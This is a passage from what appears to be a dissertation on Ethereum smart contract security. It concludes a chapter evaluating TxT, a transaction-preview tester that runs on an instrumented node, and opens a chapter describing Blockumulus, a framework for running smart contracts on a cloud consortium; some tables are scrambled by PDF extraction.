of the nine steps of a successful transaction security testing using TxT.
      ¶ Unplugging from Distributed Node: Virtually all Ethereum wallets are connected to Mainnet
using a distributed Ethereum Access Service, such as Infura [22] or POKT [24]. In order to test
transactions with TxT, the user should connect to the TxT server.
      · Connecting to TxT Node: Popular advanced Ethereum wallets, such as MetaMask, allow to
connect to a custom Ethereum network by providing its address and port. In most wallets, this is a
one-time setup, after which the user can use a drop-down menu to switch between TxT service and
Mainnet.
      ¸ Sending Test Transaction: Once the user switches to the the TxT network, which is essentially
the Mainnet network accessed through the TxT Ethereum node, the user submits a transaction as
if it was a usual transaction. This prompts the wallet to show the confirmation dialog, asking the
user to select or manually enter the fee parameters. The user specifies a very low gas price (e.g., 1
wei)46 . Once the transaction is submitted, TxT immediately begins processing it.
      ¹ Transaction Forwarding: Next, the instrumented node forwards transaction to the Ethereum
Mainnet network using the gossip P2P protocol. Since we aim at preventing the execution of the
test transaction by the Mainnet network at large, we expect the transaction to be rejected by all other
nodes except the instrumented TxT node due to a very low gas price (i.e., Tp  µ(Tp )) specified
by the user in the wallet.
      º Rejection by Mainnet at Large: Ethereum nodes place transactions into transaction pools,
in which transactions are awaiting execution. Our experiments confirm that severely underpriced
transactions are rejected by most Ethereum nodes early on, without reaching the transaction pools.
      » A Posteriori State: Since the user’s wallet is connected to the TxT network, the state of TxT
node becomes the ground truth for the wallet or a dApp connected to that wallet. Therefore, the
test transaction rejected by the Mainnet network outside of the TxT node will be seen as executed
   46
      Some wallets prohibit tiny gas prices for Mainnet transactions. However, they do not impose gas price limits on
TxT because it is a custom network.
                                                          133


by the wallet. We call this situation the a posteriori state, i.e., the state of the blockchain caused by
the execution of the test transaction.
    ¼ Test Transaction Status: TxT provides the status information for each transaction (delivered
via a web page, API, or other methods). After submitting the transaction, the user will observe
one of the following four test transaction statuses: S1: Transaction is unconditionally testable
(σ-deterministic) and valid (unexpired); S2: Transaction is σ-deterministic, but it is expired; S3:
Transaction is σ-nondeterministic, but TxT found a potential vulnerability; and S4: Transaction is
untestable (σ-nondeterministic and no vulnerabilities found).
    If the transaction is successfully executed and unexpired (S1), the user may submit the test trans-
action to Mainnet, if the a posteriori state is satisfactory. If the transaction is successfully executed
but expired (S2), then the user should repeat the test. If the transaction is σ-nondeterministic with
a potential vulnerability warning (S3), the user cannot rely on TxT for testing the transaction, but
TxT provides a warning facilitating the assessment of risks via traditional methods. Finally, if TxT
determines that the transaction is untestable (S4) that the transaction cannot be evaluated by TxT.
    ½ Reconnecting to Distributed Node: If the transaction is testable, unexpired, and a posteriori
state matches the user expectation, then this transaction can be safely submitted to Mainnet for
final execution. In this case, the user switches the wallet back to the Mainnet network node for
submitting the transaction as usual.
    ¾ Submitting Mainnet Transaction: An unexpired σ-deterministic transaction is guaranteed to
have the same outcome as the test transaction. Even if transaction expires right at the moment it is
submitted, the user might initiate an emergency cancellation of the transaction before it is mined
following the Ethereum transaction replacement procedure supported by most crypto wallets [86].
    The above procedure corroborates that a TxT user does not require to employ advanced techni-
cal skills (e.g., understanding the contract code) or meticulously investigate the safety of a planned
transaction (or transaction sequence). Moreover, the user assesses the outcome of the test transac-
tion(s) using the familiar interfaces, such as crypto wallet and/or dApp.
                                                    134


            Table 5.2: Summary of vulnerability coverage by state-of-the-art defense tools.
                                                     Vulnerability (SWC Registry number)†
          Defense          100
                           101
                           102
                           103
                           104
                           105
                           106
                           107
                           108
                           109
                           110
                           111
                           112
                           113
                           114
                           115
                           116
                           117
                           118
                           119
                           120
                           121
                           122
                           123
                           124
           Tool
                           125
                           126
                           127
                           128
                           129
                           130
                           131
                           132
                           133
                           134
                           135
                           136
    Oyente [200]           #######                 #####                  #       ####################
    Securify [271]         ####           #
                                          G        ######                 ########                   ############
    Mythril [215]          #     ##       #        ##       #     #       #       #G
                                                                                   ###################
    Sereum [240]           #######                 #############################
     Vandal [76]           #####                   #######                    ##    ###############G
                                                                                                   ###
    sGuard [220]           #     #####             #######                    #####################
     ZEUS [168]            #     #####             ######                         #################                      ##
  ConFuzzius [119]         #     ##       #        ##       #     #       #       #G
                                                                                   ###################
   VeriSmart [261]         #     ###################################
   SmarTest [260]          #     ###            ###         ############G
                                                                        ##############
     Osiris [269]          #     ###################################
  ECFChecker [137]         #######                 #############################
     Maian [223]           #####                ##############################
   TxT (our work)                         #                           #                                            #    #
                     — full support; G
                                     # — partial support; # — no support;  — explicit detection of vulnerability.
  †
      https://swcregistry.io/.
5.6: Implementation and Evaluation
In this section, we evaluate our implementation of TxT to confirm the feasibility of its real-world
deployment.
5.6.1: Implementation and Deployment
We implement TxT by instrumenting Go Ethereum 1.10.10 and adding additional data-processing
modules using Node.js 12.22.5 with Web3.js 1.2.6 and Python 3.9.7. In order to prevent accidental
disruption of the normal Ethereum execution, our instrumentation of Go Ethereum includes only
minimal necessary modifications, i.e., gathering and saving chain data, and overriding the gas price
bottom limitations only for specified accounts representing the customers of a TxT server. The
gathered data is then processed independently of the node by external Node.js and Python modules.
      We deploy TxT on Dell PowerEdge T640 server with 2 Intel Xeon Gold 5218 CPU, 250 GB
RAM, and SATA SSD (6 Gbps throughput), connected to 1 Gbps wired Internet link. The instru-
                                                                135


mented TxT node uses the full synchronization mode with one CPU mining thread (for enabling
opcode execution), and 8,192 MB of cache. In current implementation, we use SSH and text inter-
face for test transaction status retrieval.
5.6.2: Vulnerability Coverage by TxT
We implement 37 cases reproducing all the cataloged smart contract vulnerabilities in the SWC
Registry [42]. After that, we test all the transaction sequences reproducing these vulnerabilities on a
TxT deployment to assess which vulnerabilities are detectable by TxT. One important aspect of this
assessment is that we judge the ability of TxT to reveal a vulnerability not only based on our sample
implementation, but also based on the ability to address all possible vulnerable implementations.
We compare TxT with 13 state-of-the-art defenses based on their self-reported coverage disclosure.
    The result, shown in Table 5.2, demonstrates that TxT significantly outperforms all the state-of-
the art tools in terms of the number of vulnerabilities it is able to defend against. Specifically, all
the state-of-the-art tools combined only detect and/or prevent 15 out of 37 vulnerabilities (40.5%
coverage), while TxT deterministically prevents 31 out of 37 (83.8% coverage). Furthermore, if
we add the warnings of potential insecurity to our assessment, the vulnerability coverage by TxT
reaches 89.2%.
    Some vulnerabilities, such as SWC-105, SWC-115 and SWC-134, are semantic-dependent, i.e.,
they rely upon understanding of the intent of the developer and/or user, and therefore they are only
supported by the heuristic tools. For example, a pattern corresponding to SWC-105 (“Unprotected
Ether Withdrawal”) is perceived as a dangerous omission in most contracts, but the same behavior
could be correct if the contract is designed to be an Ether faucet. Moreover, SWC-136 (“Unen-
crypted Private Data On-Chain”) still remains unsupported by all existing tools, including TxT.
Addressing this vulnerability would requires the identification of a leaked secret, which is insur-
mountable.
                                                    136


Table 5.3: Number (×106 ) and percentage of accounts exhibiting state retention within set time
threshold.
                                                State retention threshold (θexp )
                              Counting
                             condition           60 sec.    600 sec. 3600 sec.
                          All txns testable      122.38      115.11      109.68
                         (min(∆t) > θexp ) (93.19%) (87.65%) (83.52%)
                         Avg. txns testable      124.80      121.50      119.08
                           (µ(∆t) > θexp )     (95.04%) (92.52%) (90.67%)
                            90% testable         124.86      121.59      119.19
                         (P90% (∆t) > θexp ) (95.08%) (92.59%) (90.76%)
5.6.3: Transaction Expiration Rate
TxT tests are prone to expiration due to the constantly changing state of blockchain. In this eval-
uation, we gather over 1.3 billion transactions (from the Genesis block until November 5, 2021)
submitted to over 131 million Ethereum accounts (smart contracts and EOAs) to find the percentage
of accounts resilient to transaction expiration. To assess the transaction expiration resiliency, we
pick three time thresholds (1 minute, 10 minutes, and 1 hour), and we group all accounts into three
categories: 1) the ones that have never experienced transaction expiration within the set threshold;
2) the ones which transactions on average (mean) do not expire before the threshold; and 3) the
ones with 90% or more transactions not expiring before the set threshold, as shown in Table 5.3.
    The experimental result demonstrates that statistically the vast majority of test transactions
will not expire within reasonable time, sufficient for submitting the final transaction to Mainnet.
However, if the test expires earlier than the final Mainnet transaction is submitted, the user has
a choice to repeat the test, and the probability of success after the multiple tests will be Psucc =
1 − (1 − Psingle )k , where Psingle is the probability of success for a single test within the given time
threshold, and k is the number of attempts. Thus, even if transaction expires before the user submits
the final one, a repeated test will address the problem, as shown in Fig. 5.5.
                                                   137


                 Figure 5.5: Probability of avoiding expiration via repeated testing.
5.6.4: σ-nondeterministic Transactions
In this work, we propose a paradigm allowing to deterministically predict the result of a transaction
at the expense of rejecting a small portion of transactions that we call σ-nondeterministic. TxT is
unable to guarantee the outcome of a σ-nondeterministic transaction, however, we are able to par-
tition these transactions into potentially unsafe (prone to SWC-120 and SWC-116 vulnerabilities),
and untestable (not necessarily vulnerable, but the result is unpredictable).
     Fig. 5.6 shows the result of processing over 1.3 billion Ethereum transactions with opcode anal-
ysis of their execution stacks. The result shows the counts of opcode presence events (i.e., several
identical opcodes within one call stack count as one event), divided into three groups: untestable
(no vulnerability markers), SWC-120 markers, and SWC-116 markers. The latter two groups pro-
duce respective warnings regarding possible vulnerabilities, while the untestable transactions are
to be rejected by TxT.
     The evaluation shows that approximately 86.27% of all transactions are σ-deterministic and
13.73% are σ-nondeterministic. Out of almost 185 million σ-nondeterministic transactions, only
25.5% are purely untestable, which means that TxT completely rejects about 3.5% of transactions,
and gives at least partial results for 96.5% of transactions. We believe that through a deep opcode
and EVM stack analysis it is possible to further reduce the rate of σ-nondeterministic and untestable
                                                  138


Figure 5.6: Occurrence of σ-nondeterministic opcodes in the execution stack of 1.3 billion
Ethereum transactions.
transactions.
5.6.5: Underpriced Transactions in the Wild
The transaction underpricing approach, utilized by TxT, raises a concern: if a block does not have
enough properly priced competing transactions, the underpriced test transaction might be included
in this block [288]. Our evaluation shows that Ethereum Mainnet has 2,506,498 zero-priced trans-
actions (as of November 2021)47 . These transactions have been a known nuisance in the Ethereum
community [87]. Although the rate of zero-priced transactions on Ethereum is only 0.186%, the
very fact of their presence poses a threat to the feasibility of TxT. Fortunately, the EIP-1559 [79]
proposal, which has been enforced at the London hard fork, solves the problem. Although the pro-
tocol adjustment does not explicitly target the zero-priced transactions, it effectively makes these
transactions impossible. To verify this, we process over 111 million transactions soon after the Lon-
don fork to confirm that none of them has a gas price lower than 1,423,420,054 wei (see Fig. 5.7).
Thus, after the London fork, it is no longer possible to accidentally mine an underpriced transaction.
5.6.6: TxT Delays and Transaction Efficiency
TxT is implemented as an instrumented Go Ethereum node incurring some additional transaction
execution delays. Moreover, as TxT continues processing transactions, the transaction execution
delay may increase due to the growing cache size of TxSEA algorithm. In this part of the evaluation,
   47
      For example, 0xc3fa8399ef7922aef0ec7278f7b4b5e28e7191e ba3027ca1143af2cf17acae86
                                                  139


Figure 5.7: Minimal accepted gas price of 111,226,625 post-London transactions on Mainnet. With-
out the loss of correctness, we apply the moving minimum function to the data.
we first measure the added per-opcode delay of TxT instrumentation over a large time period. Then,
we make a projection of the added delay of transaction execution by a TxT node.
    For our evaluation experiment, we compare the opcode execution delays between instrumented
TxT node and a pure Go Ethereum node. The experiment was conducted on the same Dell Pow-
erEdge T640 server as the rest of the experiments. The time-critical core module of TxT is repeat-
edly invoked in the opcode processing loop of the Run function in core/vm/interpreter.go.
We activate TxT for historical Mainnet transactions, and collect timestamps at every iteration of
the loop, which gives us the delay of execution of a single opcode. After that, we remove all the
TxT code from the node, leaving only the timestamp collection instruction, and execute the same
transactions again, this time without TxT. To be able to better visualize the data without the loss
of generality, we collect the execution delays of 500 million of executed opcodes, both with and
without TxT, and split them into 500 frames, each containing 1 million transactions. Then, for
each of the frames, we plot the difference between the average instrumented and non-instrumented
delays, which we call the added delay (i.e., the difference in opcode processing delay between TxT
and baseline approach, see Fig. 5.8). The result shows that despite growing TxSEA cache, TxT
                                                 140


Figure 5.8: Additional time (in nanoseconds) that the instrumented TxT node spends on average
for executing one opcode compared to the baseline non-instrumented node. Despite growing cache
size, the execution delay is not visibly increasing even after 500 million processed opcodes. The
measurement is a average of 500 frames, each with 1 million transactions.
does not exhibit any noticeable growth in added opcode processing delay. Moreover, the average
delay for each frame stays between 2,300 and 3,000 nanoseconds per opcode.
    In our next experiment, we count the number of opcodes executed by a sample of 100 mil-
lion transactions in Ethereum Mainnet. Then, we create a distribution of the transaction opcode
counts, shown in Fig. 5.9. As we can see, the vast majority of transactions execute less than 5,000
opcodes. The results of the evaluation show that most added opcode execution delays are under
3,000 nanoseconds, while the vast majority of transactions execute under 5,000 opcodes. There-
fore, the added delay caused by TxT implementation does not exceed 3, 000 · 5, 000 · 10−6 = 15 ms.
Assuming that the sequence of transactions in a tested workflow does not exceed 10, the TxT delay
per test will not be larger than 150 ms, which is negligible. The state-of-the-art smart contract tester
Confuzzius [119], which claims enhanced time performance compared to previous testers, requires
500-1,000 seconds of time to achieve 75% instruction coverage. Compared to Confuzzius, TxT
delivers almost instant result because it dynamically tests transactions against the current state of
blockchain.
                                                  141


Figure 5.9: Number of executed EVM opcodes per transaction, based on the sample of 100 million
transactions.
    Last, but not least, we evaluated the performance and feasibility of TxT over the Proof-of-Stake
consensus that was recently adopted by the Ethereum network. Except for the necessity to update
several command-line parameters, we did not notice any performance or other difference between
TxT operating on Proof-of-Work consensus versus Proof-of-Stake.
5.7: Limitations and Discussion
This is the first work on a deterministic approach of smart contract testing using the transaction en-
capsulation. We believe that our work opens up a new era of non-heuristic audit of smart contracts.
However, the paradigm shift comes with some remaining challenges and open questions.
Testing Eligibility: The current implementation of TxT provides a practical proof of concept of the
transaction encapsulation framework. However, the rate of σ-nondeterministic transactions is still
high. Our evaluation shows that the major culprits are the NUMBER and BALANCE opcodes in the call
stacks of the tested transactions. However, we observed that the conditional statements involving
the NUMBER opcode often turn into tautologies or contradictions when Tb,i is larger than a certain
value. In other words, we have sufficient reason to believe that the rate of σ-nondeterministic
transactions can be drastically reduced by designing more fine-tuned procedures for identifying
σ-nondeterministic transactions.
                                                 142


State Expiration: Blockchain is a dynamic multi-user environment in which executed transactions
constantly create interference to one another. This interference is the cause of TxT test expiration.
In this work we use a coarse assumption Tb,j > Tb,i ∧ Tt,j = Tt,i for determining the transaction
expiration. However, we believe we can significantly reduce the rate of expiration by exploring the
execution stacks of purportedly interfering transactions and determining which of them effectively
interfere with the testing transaction.
Custom RPC Support by Crypto Wallets: TxT design assumes that the user wallet, which is
the proxy to the Ethereum ecosystem, has the support for adding a custom RPC network. While
most popular wallets support this feature, some other wallets (e.g., MyEtherWallet [23]) do not.
However, in the spirit of decentralization and trust elimination, most Ethereum wallets are open-
source, which makes it easy to add a modification or plugin for supporting a custom RPC.
Transactions from Multiple Accounts: The current design of TxT assumes that the entire trans-
action sequence originates from the same account, which is by far the most obvious scenario. How-
ever, we also admit that some transaction sequences might require testing involving several ac-
counts, such as in the case of multi-signature distributed token wallets. Although the multi-account
support is deliberately removed from the current design to avoid unnecessary complication, our
analysis indicates that implementing this functionality is tantamount to improving some bookkeep-
ing routines in the current design.
Deployment Scalability: The current implementation of TxT does not allow to run multiple testing
sessions on one instrumented node, which means that the TxT security provider must maintain a
sufficient number of separate instrumented Ethereum nodes to accommodate all simultaneous test-
ing requests. On the one hand, the computation cost is not a big concern because TxT instrumented
nodes do not require competitive mining. On the other hand, each node must be fully synchronized,
with approximately 500GB of per-node storage requirement. Yet, we believe it is possible to or-
chestrate testing to allow execution of non-conflicting transactions on the same node. We leave
this functionality for future research.
                                                 143


5.8: Chapter Summary
Traditional software often requires user confirmation of critical operations, such as deleting records
or submitting web-based applications. Implementing the same mechanism in smart contracts is
notoriously hard due to the notorious TOCTOU issue caused by the ever-changing state of the
blockchain. In this work, we provided the first solution to address this problem by allowing a
user to preview and confirm transactions. To make it feasible, we formally determined the ex-
act set of conditions for transaction replicability and introduced transaction encapsulation, a new
framework for deterministic real-time transaction testing, which uncovers the outcome of the in-
tended transactions or transaction sequences. Transaction encapsulation could effectively capture
the unpredictable behaviors associated with known and zero-day vulnerabilities. We developed
and implemented the transaction tester TxT. Through extensive experiments, we demonstrated that
TxT prevents the exploitation of more than twice as many vulnerabilities as covered by the existing
defense tools combined. In the spirit of open research, we will make TxT and all the evaluation
artifacts open source.
                                                  144


CHAPTER 6: SMART CONTRACTS ON
THE CLOUD48
6.1: Introduction
Bitcoin is the first decentralized digital currency powered by blockchain with proof-of-work (PoW)
consensus, which effectively prevents data tampering by anyone with less than half of the total
computational power of the network [216]. Recently, Dembo et al. delivered a formal proof of
the correctness of the above statement with respect to the original PoW Nakamoto consensus [106].
Although Bitcoin’s original purpose was to serve as a cryptocurrency transaction ledger, the unique
properties of blockchain soon attracted researchers and engineers to re-purpose the technology for
a plethora of decentralized applications, commencing the era of smart contracts.
       Smart contracts are decentralized immutable programs that allow to establish custom mediator-
free protocols between parties that do not trust one another. For example, a smart contract can
be used to help conduct an election in a decentralized manner [144, 275]. Another popular use
case is fungible tokens, which can represent corporate shares, gift card balances, and even custom
currencies. Recently, researchers and businesses proposed a wide variety of smart contract applica-
tions [159, 237, 239], some of which have already been adopted by nations’ governments and large
industries [286]. However, the unique features of blockchain and smart contracts come at a high
price of mediocre performance and bounded scalability.
       One way to address the performance and scalability issues of blockchain is to use a private per-
missioned blockchain framework, such as Hyperledger Fabric [53], which only uses pre-installed
    48
       This chapter is based on previously published work by Nikolay Ivanov, Qiben Yan and Qingyang Wang
titled “Blockumulus: A Scalable Framework for Smart Contracts on the Cloud” published at the Proceed-
ings of the 2021 IEEE 41st International Conference on Distributed Computing Systems (ICDCS). DOI:
10.1109/ICDCS51616.2021.00064 [162]. © 2021 IEEE. Reprinted, with permission, from Nikolay Ivanov, Qiben
Yan and Qingyang Wang “Blockumulus: A Scalable Framework for Smart Contracts on the Cloud” (paper and IEEE
titles are the same), July 2021.
                                                      145


smart contracts (called chaincode) and splits the voting power between a small number of fixed par-
ticipants. Although such blockchains deliver performance improvement over public blockchains,
the requirement to establish a trustworthy consortium of organizations running these blockchains
prevents its wide adoption in many applications, such as cryptocurrencies and decentralized voting.
Thus, public blockchains cannot be replaced by permissioned ones.
     Recently, a number of solutions have been developed to address the inherent performance
and scalability issues of public blockchain, including partial off-chain computation [98], side-
chaining [231], cross-chaining [287], sharding [130, 298], payment channels [110, 232], efficient
consensus protocols [68], new blockchain architecture [262], and network optimizations [90]. How-
ever, all these solutions suffer from at least one of the following limitations. First, they could not
deliver scalability in transaction throughput, data storage, and computation capacity at the same
time. Second, the performance improvement is often incremental, but could be insufficient for
many applications, such as retail payments. Third, they either do not support smart contracts, or
their smart contracts are not Turing-complete [209], making it impossible to realize certain pro-
gramming patterns. A recent blockchain scalability survey by Zhou et al. [308] concludes that a
desired solution still has not been found. In this work, we propose a conceptually new approach to
the blockchain scalability problem: we use an existing blockchain as-is to enable smart contracts
on an already scalable system: the cloud.
Observation 1. Centralized Service for Scalable Decentralized Contracts: The operation of
decentralized systems is often supported by underlying centralized and/or permissioned services.
For example, the decentralization of Domain Name System (DNS) is based on the assumption that
the Internet Corporation for Assigned Names and Numbers (ICANN), which oversees the system,
is functional and trustworthy [170]. Such pattern is also observed in public blockchains. Kwon et
al. [180] formally demonstrate that classic public blockchains exhibit partial centralization incurred
by concentration of compute power around a few mining pools. Moreover, the decentralized nodes
of blockchains use the Internet as a communication medium, which is subsequently enabled by a
network of centralized routers and Internet service providers (ISPs), whose owners must comply
                                                  146


with the regulations of local and federal jurisdictions. In this work, we extrapolate the above prin-
ciple (i.e., the reconciliation of centralization and decentralization) to show that it is feasible and
beneficial to build an environment that uses a centralized cloud as an underlying communication,
storage and compute service for decentralized smart contracts. Particularly, this work demonstrates
that cloud resources, such as storage and computation, can be treated as a utility (offered by a third
party), which can support the operation of a decentralized network.
Observation 2. High Cost of Permissionless Network: Public blockchains are supported by
unstructured permissionless P2P networks, where nodes can freely join and leave. To support such
a flexibility, the blockchains use a gossip protocol for peer communication. In this protocol, the
peers are unaware of the current configuration of the network, so they achieve the network-wide
propagation of broadcast messages by forwarding them through a subset of known peers. This
incurs a significant message propagation latency and strict limits on the amount of data that can
be transferred [105, 298]. Moreover, to prevent Sybil attacks, in which an adversary creates a
large number of fake identities for gaining greater voting power, the PoW consensus algorithm
has been used by Bitcoin, Ethereum, and many other popular blockchains. The PoW consensus
involves a heavy computation, resulting in enormous electricity consumption. As such, public
blockchains pay a very high price for the flexibility of the underlying P2P network. In this work,
we show that a smart contract can be used to facilitate a decentralized consensus in an overlay
smart contract environment built upon a centralized network of cloud providers, which drastically
reduces communication and computational overhead.
    Putting together the above observations, we develop the concept of overlay consensus, which
aims to deliver decentralization to smart contracts in a centralized cloud instead of random P2P
network nodes. As a result, a consortium of clouds can host a permissionless smart contract envi-
ronment and sell the access to it, but it cannot control the execution of these contracts or interfere
with the data stored by these contracts. To achieve this, we use a smart contract deployed on a
public blockchain to accrue periodic proofs of decentralization reported by the cloud consortium.
The smart contract is designed in a way that any attempt of a foul play would inevitably generate a
                                                   147


                  Table 6.1: Comparison of Blockumulus with state-of-the art solutions.
                                     General-purpose smart           Scalability improvement
                   Solution
                                         contract support          TPSa Storage Compute
                Algorand [130]                     7                 3          7            7
              RapidChain [298]                     7                 3          7            7
               Lightning [232]                     7                 3          7            7
                  Ekiden [98]                      3                 3          7           3
                Arbitrum [167]                     7                  7         7           3
                  Jidar [103]                      7                  7         3            7
               Monoxide [279]                      7                 3          3            7
                 Plasma [231]                      3                  7         ?           3
             OmniLedger [175]                      7                 3          7            7
                Blockumulus                        3                 3          3           3
             a
               Transaction throughput (transactions per second).
publicly-verifiable proof for the action of breaking the consensus protocol.
      In summary, we make the following contributions:
      • We introduce Blockumulus49 , a distributed framework for cloud contracts (bContracts50 )
         based on the novel concept of overlay consensus.
      • We implement the full Blockumulus stack along with a sample bContract, called FastMoney,
         for payment processing.
      • We evaluate our Blockumulus implementation and the FastMoney bContract to show that
         the framework delivers low transaction latency, high transaction throughput, and affordable
         operation cost.
6.2: Comparison with SOTA
Table 6.1 compares the state-of-the art (SOTA) solutions aiming to address the blockchain scal-
ability and performance limitations. Although these studies improve the blockchain scalability,
they could not simultaneously accommodate the growing demand for transaction throughput, data
storage, and heavy computation, in applications such as cryptography, AI, and big data analytics.
In contrast, Blockumulus brings general-purpose smart contracts (i.e., the smart contract suitable
   49
      The name Blockumulus is the portmanteau of the words “blockchain” and “cumulus” — a type of cloud with the
traditional puffy texture.
   50
      bContract stands for “Blockumulus contract”.
                                                      148


                                Figure 6.1: Blockumulus overview.
for a variety of applications beyond cryptocurrency transactions) on the cloud, which improves
blockchain scalability in terms of transaction throughput, data storage, and computation simultane-
ously.
6.3: System Design
In this section, we introduce the Blockumulus framework and its operation protocol.
6.3.1: Blockumulus Overview
Blockumulus is a framework that builds a decentralized environment for executing smart contracts
upon a cloud consortium — a fixed set of M cloud nodes called cells, synchronized by the overlay
consensus. The overlay consensus is empowered by a smart contract deployed on a third-party
public blockchain, with independent auditors running software for an automated verification of
Blockumulus workflow (see Fig. 6.1). Next, we introduce the major concepts of Blockumulus.
Blockumulus Code Execution Model: The code execution in Blockumulus is performed in de-
centralized Blockumulus smart contracts called bContracts, as shown in Fig. 6.2. The code of
                                                 149


                      Figure 6.2: Blockumulus state transition and data model.
bContracts is openly accessible, so that the execution of transactions could be verified by anyone.
The functions of bContracts are invoked through signed transactions arriving at the network, and
the code in bContracts can be executed by appropriate interpreters. bContracts can be written in
different programming languages, such as Python or JavaScript.
Blockumulus Data Model: All data in Blockumulus is openly accessible and managed via cus-
tom models implemented in the deployed bContracts. In order to store data as part of Blockumulus,
each bContract must implement two interfaces: data fingerprinting and data cloning. Data finger-
printing is a function that produces a fingerprint of the bContract’s current state or previously saved
state. The data cloning function asks the contract to temporarily save its current state of data for sub-
sequent fingerprinting. Blockumulus then combines all the fingerprints reported by the bContracts
into a single hash called the data snapshot fingerprint.
Overlay Consensus: The core idea of Blockumulus overlay consensus is to periodically report the
hashes of data snapshots to a dedicated smart contract deployed on a public blockchain, as shown
in Fig. 6.3. Once the report is submitted, it cannot be altered. Subsequently, if the report does not
match the publicly available and independently verifiable snapshot, the cell cannot be trusted. In
essence, the Ethereum smart contract serves as an online barometer of liveness and integrity of the
Blockumulus deployment.
                                                  150


    Blockumulus overlay consensus has two major differences with the traditional Nakamoto con-
sensus observed in popular public blockchains. First, Blockumulus consensus uses correctness
check instead of voting — all incoming transactions are recorded, and there is only one correct
way to execute them such that the existence of two conflicting transactions in different cells is
ruled out. Second, all transactions are executed immediately, during the open session with the
client, with a pre-defined decision deadline — as a result, a consensus partitioning (called fork)
is impossible in Blockumulus. Unlike in a distributed database, which stipulates identical query
execution in all tables, Blockumulus provides autonomous but distinct execution environments for
each individual bContract. The contracts with mismatching fingerprints can be excluded from the
consensus, and timely fingerprint reports can be guaranteed even if some contracts are unable to
establish consensus within their respective contexts. The goal of each bContract is to assure that
a transaction is executed identically across all the cells. To enforce this, after each transaction,
the called bContract produces a fingerprint of its current data. If the fingerprints do not match,
the bContract is temporarily excluded from the snapshot. As a result, each transaction entails an
identical state transition of each cell in Blockumulus. If a cell becomes irresponsible or fails the
verification, it is excluded from the consensus until the next report cycle.
Report Timing: Prior to deployment, the cloud consortium determines the system invariants that
cannot be changed during the lifetime of the system. One of these invariants is the snapshot report
period, denoted λ, which is measured in seconds. In Blockumulus, the report deadlines are all
timestamps divisible by λ. Therefore, the last report deadline can be calculated as td = tc M OD λ,
where tc is the current timestamp. Thus, the upcoming report deadline is calculated as tnext =
λ + tc M OD λ. Every data snapshot, denoted Si , has a serial number i, which is called the report
                        td −t0
cycle, represented as      λ
                               , where t0 is the deadline of the very first snapshot in the Blockumulus
deployment. Subsequently, the Blockumulus protocol requires that each cell reports the snapshot
Si by the end of cycle i + 1 in order to be treated as valid during the cycle i + 2.
                                                    151


                    Figure 6.3: Reporting of current cell state to the smart contract.
6.3.2: Blockumulus Components
Next, we introduce the major components of Blockumulus: consortium of cloud cells, decentral-
ized Blockumulus smart contracts (bContracts), clients, Ethereum smart contract, and independent
auditors.
Cloud Consortium: The cloud consortium is a pre-defined set of Blockumulus cells. The number
of cells should be sufficient to guarantee the availability of the system, but it should not be too
large (i.e., 10 or less) to avoid performance degradation. Unlike peers in blockchain, multiple cells
in Blockumulus are used to achieve the accessibility and fault-tolerance, rather than the consen-
sus, which will be detailed in Section 6.4. Moreover, since clouds allow vertical scalability (i.e.,
adding resources to existing entities), a large number of cells (horizontal scalability) is not needed
for performance advancement either. The size of the consortium and the set of identities of the
                                                  152


participating cells are the invariants that must be decided at the time of deployment.
Blockumulus Cell: A Blockumulus cell is a network node on the cloud, which is sufficient for
participating in Blockumulus consensus. A cell can be represented by a virtual machine, physical
dedicated server, or a compute cluster — whichever meets the demands of the system.
bContracts: Blockumulus smart contracts (bContracts), are decentralized programs deployed on
Blockumulus, whose functionality is similar to smart contracts in Ethereum or chaincode in Hyper-
ledger Fabric. There are two types of bContracts: system bContracts and community bContracts.
The system bContracts are pre-deployed in Blockumulus, and they cannot be removed. The com-
munity bContracts are developed and deployed by clients.
Blockumulus Clients: Blockumulus client is a person or software that interacts with a deployed
bContract. Blockumulus is a permissionless environment for clients, which means that clients do
not have to register a Blockumulus account. However, akin to the ISP model for Internet access,
a client should have a subscription to Blockumulus through one of the cells. The subscription,
however, does not incur any control over the use of Blockumulus. The purpose of the subscription
is to charge for data transferred or time period during which the subscription is active. This contrasts
with the transaction fee collection observed in public blockchains. As a result, Blockumulus offers
flexibility that allows cells to establish their own pricing policies to compete for customers.
Ethereum Smart Contract: Each Blockumulus deployment has a smart contract on Ethereum
blockchain, which stores hashes of the reported snapshots. To avoid retrospective modification,
the repeated reporting for the same timestamp is prohibited by the logic of the smart contract.
Blockumulus Auditors: Akin to public blockchain, Blockumulus is an open-data system with
transparent execution, i.e., Blockumulus data is available to everyone, and everyone can indepen-
dently trace state transition between a given pair of subsequent data snapshots. Auditors are volun-
tary permissionless participants that run software to oversee the integrity of the Blockumulus de-
ployment. The community auditing model, which demonstrated its efficiency in public blockchains,
is also employed in Blockumulus. Auditors can be a paid participants, community enthusiasts, se-
curity bounty hunters, or academic researchers. Moreover, cells in the consortium can perform
                                                   153


                               Figure 6.4: Blockumulus audit procedure.
cross-audit. The process of auditing requires only a server and the auditing software that is run-
ning on this server to monitor the integrity of Blockumulus. Fig. 6.4 shows the procedure of the
Blockumulus audit. The auditing software performs two major tasks: snapshot succession audit
and data integrity audit. The snapshot succession audit is the verification that all the transactions
processed by all bContracts between two reports indeed entail a state transition from one data snap-
shot into another. The data integrity check verifies that: a) the snapshot fingerprints have been
reported to the smart contract on time; and b) the fingerprints in reports match the actual data in
the cells.
6.3.3: Blockumulus Cell Architecture
In this section, we take a closer look at the architecture of a cell, which is shown in Fig. 6.5.
Blockumulus Core: Blockumulus cell Core is responsible for networking, cryptography, synchro-
nization, protocol, process and thread management, signature and authenticity verification, trans-
action parsing, data encoding and decoding, and communication with the smart contract.
Uniform RESTful Interface: Blockumulus assumes six vectors of communication: client-cell,
cell-cell, auditor-cell, cell-blockchain, auditor-blockchain, and client-auditor. The client-cell, cell-
cell, and auditor-cell communications have a uniform RESTful interface. Specifically, each request
                                                  154


                           Figure 6.5: Blockumulus components and bContracts.
is either GET or POST HTTP request with the body formally represented as the following set:
                                M = {P = hAs , Ar , O, η, τ, t, Di, Sigs (P)}
, where P is the payload of the message, and Sigs is the ECDSA signature calculated via the private
key of the sender. The tuple P has the following components: As is the public address of the sender,
Ar is the public address of the intended recipient, O is the operation code, η is a random nonce used
as a message ID, τ is the ID of the message that M is replying to (if applicable), t is the current
timestamp, and D is the data, whose format is determined by O.
Keys: Each cell uses an Ethereum account to represent itself within Blockumulus. The set of public
addresses51 of Blockumulus cells is fixed for each deployment and is hard-coded in the Ethereum
smart contract.
System Invariants: Some parameters of a Blockumulus deployment that remain constant for a
   51
      In Ethereum, a public address of an account is the 160-bit prefix of the Keccak256 hash of the account’s public
key.
                                                         155


